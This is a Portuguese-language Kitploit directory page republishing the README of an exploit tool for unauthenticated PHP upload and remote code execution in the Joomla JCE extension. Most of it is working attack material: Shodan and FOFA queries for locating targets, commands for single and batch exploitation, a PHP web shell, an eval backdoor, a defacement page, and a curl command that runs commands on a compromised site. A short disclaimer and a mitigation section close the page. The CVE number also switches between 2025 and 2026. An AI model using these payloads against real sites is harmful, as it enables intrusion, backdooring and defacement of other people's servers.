Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Exploit de RCE não autenticado para Joomla JCE < 2.9.99.5 | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Exploit de RCE não autenticado para Joomla JCE < 2.9.99.5

Ver Repositório
41há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Joomla Logo

CVE-2026-48907 - Joomla! JCE RCE não autenticada

Joomla! JCE extension < 2.9.99.5 - Upload Arbitrário de Arquivo PHP e Execução Remota de Código não autenticados

License: MIT Python 3.6+ Security Shodan FOFA


🔎 Consultas em Mecanismos de Busca

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 Visão Geral

Este repositório contém um prova de conceito (PoC) para a CVE-2026-48907, uma vulnerabilidade crítica na extensão Joomla! JCE (Joomla Content Editor) em versões anteriores a 2.9.99.5. A vulnerabilidade permite que atacantes não autenticados façam upload de arquivos PHP arbitrários por meio da funcionalidade de importação de perfil do JCE, levando à execução remota de código (RCE).

⚠️ Aviso

Esta ferramenta é apenas para fins educacionais e de teste autorizado.

  • Use apenas em sistemas que você possui ou tem permissão explícita para testar
  • O autor não se responsabiliza por qualquer uso indevido ou atividades ilegais
  • Sempre obtenha autorização adequada antes de testar

🔍 Detalhes da Vulnerabilidade

Como Funciona

  1. Extração do Token CSRF: O exploit primeiro extrai o token CSRF da página inicial do alvo
  2. Abuso da Importação de Perfil: Ele utiliza a funcionalidade de importação de perfil do JCE (index.php?option=com_jce&task=profiles.import)
  3. Upload de Arquivo PHP: Faz upload de um arquivo PHP malicioso disfarçado de arquivo XML de perfil
  4. Execução de Código: O arquivo PHP carregado é colocado no diretório /tmp/ e pode ser executado via acesso direto

🚀 Funcionalidades

  • ✅ Upload de Qualquer Arquivo PHP: Faça upload de shells PHP personalizados, backdoors ou páginas de desfiguração (baseados em PHP)
  • ✅ Processamento em Lote: Escaneie e explore múltiplos alvos a partir de um arquivo
  • ✅ Detecção Automática de Token CSRF: Extrai tokens CSRF automaticamente
  • ✅ Modo Verboso: Saída detalhada para depuração
  • ✅ Exportação de Resultados: Salve URLs de upload bem-sucedidas em um arquivo

📦 Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Instale as dependências necessárias
pip3 install requests urllib3

Requisitos

  • Python 3.6 ou superior
  • Biblioteca requests
  • Biblioteca urllib3

🎯 Uso

Sintaxe Básica

root@kitploit:~
python3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>

Exemplos

Fazer Upload de um Web Shell PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

Fazer Upload de uma Página de Desfiguração PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

Fazer Upload de um Backdoor PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

Exploração em Lote com Arquivo de Alvos

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

Com Saída Verbosa e Salvamento de Resultados

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

Argumentos da Linha de Comando

* Deve ser fornecido -u ou -f

Formato do Arquivo de Alvos

Crie um arquivo targets.txt com uma URL por linha:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comentários são ignorados
https://example-joomla.com

🔧 Criando Payloads PHP

Todos os payloads devem ser arquivos PHP, pois o exploit faz upload de código PHP que será executado no servidor.

Web Shell PHP

Crie shell.php:

root@kitploit:~
<?php
// Web Shell PHP Simples
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Uso: ?cmd=comando";
}
?>

Página de Desfiguração PHP

Crie deface.php:

root@kitploit:~
<?php
// Página de Desfiguração PHP
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hackeado por 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKEADO POR 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Segurança não é um produto, é um processo.</p>
    <p>Servidor: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Data/Hora: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

Backdoor PHP (Mínimo)

Crie backdoor.php:

root@kitploit:~
<?php
// Backdoor PHP Mínimo
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 Exemplo de Saída

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 RCE não autenticada
Autor: 0xgh057r3c0n (Upload de Arquivo PHP)

[*] Carregado(s) 3 alvo(s)

[*] Alvo 1/3
[*] ==================================================
[+] Alvo: http://target-joomla.com
[+] Obtendo token CSRF...
[+] Token CSRF: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Fazendo upload do arquivo PHP: cve-2026-48907-1234.xml.php
[+] Perfil importado com sucesso!
[+] Testando o arquivo PHP carregado...

============================================================
[!!!!!] ARQUIVO PHP CARREGADO COM SUCESSO!
[!!!!!] O servidor ESTÁ VULNERÁVEL à CVE-2025-48907!
============================================================

[+] Visualize seu arquivo PHP carregado: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Acesso rápido:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ Detecção e Mitigação

Como Detectar

  • Verifique se há arquivos PHP suspeitos no diretório /tmp/
  • Monitore a atividade de importação de perfil do JCE nos logs
  • Procure por requisições inesperadas a index.php?option=com_jce&task=profiles.import
  • Verifique a existência de arquivos com extensão .xml.php em /tmp/
  • Monitore a execução incomum de PHP a partir do diretório /tmp/

Medidas de Mitigação

  1. Atualize a Extensão JCE:

    • Atualize para a versão 2.9.99.5 ou superior
    • Baixe em: Site Oficial do JCE
  2. Soluções Temporárias:

    • Desabilite a extensão JCE se não for necessária
    • Implemente regras de Firewall de Aplicação Web (WAF)
    • Restrinja a execução de PHP no diretório /tmp/
    • Desabilite allow_url_fopen se não for necessário
  3. Ações Pós-Comprometimento:

    • Remova os arquivos PHP carregados de /tmp/
    • Audite o sistema em busca de backdoors
    • Redefina todas as credenciais (admin do Joomla, FTP, hospedagem)
    • Revise os logs do sistema em busca de acessos não autorizados
    • Verifique se há outros arquivos comprometidos

📝 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

License: MIT


🤝 Contribuição

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

  1. Faça um fork do repositório
  2. Crie sua branch de funcionalidade (git checkout -b feature/AmazingFeature)
  3. Faça commit das suas alterações (git commit -m 'Adiciona AmazingFeature')
  4. Envie para a branch (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

⭐ Histórico de Estrelas

Se você achar esta ferramenta útil, considere dar uma estrela ⭐ no GitHub!


📞 Contato e Suporte

  • Autor: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • Issues: Reportar um bug

🔗 Referências

  • NVD - CVE-2025-48907
  • Site Oficial do JCE
  • Centro de Segurança do Joomla!

Construído com ❤️ por 0xgh057r3c0n
Baixar ferramenta
PropriedadeValor
ID CVECVE-2026-48907
ProdutoExtensão Joomla! JCE
Versões Afetadas< 2.9.99.5
Tipo de VulnerabilidadeUpload de arquivo PHP não autenticado → RCE
Pontuação CVSS9.8 (Crítica)
Vetor de AtaqueRede
AutenticaçãoNenhuma necessária
ImpactoComprometimento total do sistema
ArgumentoObrigatórioDescrição
-u, --urlSim*URL do alvo único (ex.: http://target.com)
-f, --fileSim*Arquivo contendo lista de URLs de alvos (um por linha)
-F, --upload-fileSimArquivo PHP a ser carregado (shell, backdoor, página de desfiguração)
-v, --verboseNãoAtivar saída verbosa para depuração
-o, --outputNãoSalvar URLs de upload bem-sucedidas em um arquivo